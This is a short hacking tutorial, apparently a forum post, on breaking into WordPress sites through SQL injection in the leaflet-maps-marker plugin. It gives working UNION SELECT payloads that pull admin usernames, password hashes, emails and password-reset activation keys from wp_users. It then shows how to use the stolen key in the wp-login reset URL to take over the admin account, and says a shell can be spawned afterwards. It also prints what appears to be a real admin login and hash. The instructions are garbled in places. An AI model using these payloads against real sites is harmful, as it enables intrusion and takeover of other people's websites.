Today I'll show you How to inject- word press - And enter to admin panel in Seconds .
lets say we have this vuln site :
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1
and let's say We extracted column number and admin data [ user and passwors ] by sqli PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_users) where (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --
admin logo : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0
now this password is difficult to crack it
ok now i will show you Easy way to login into the admin panel
first we going to admin panel and press / Lost your password? \
PHP Code:
www.site.com/wp-login.php
now we will put the admin user we found by injectin : michelsenweb .
like this
now we haven't the admin mail to receive a link to create a new password
or to get the activation key .
OK see what i will do !!!
now we will extracted user_activation_key by injection that we will use to grate new password
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users
now we have the user_activation_key to this admin user : michelsenweb
michelsenweb:ADpMtuhLWYbPSubvKwgx
now we will use this Query to grate new password
PHP Code:
www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login
replace : user_activation_key by ADpMtuhLWYbPSubvKwgxreplace : user_login by michelsenweb .
like this
PHP Code:
hope you learned something......
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb
now we get this page to grate now password after we Makes
now password press Reset password
now password press Reset password
ok let's try to log into admin panel by our new password
aha we now in admin panel and now we can spawned shell
Post a Comment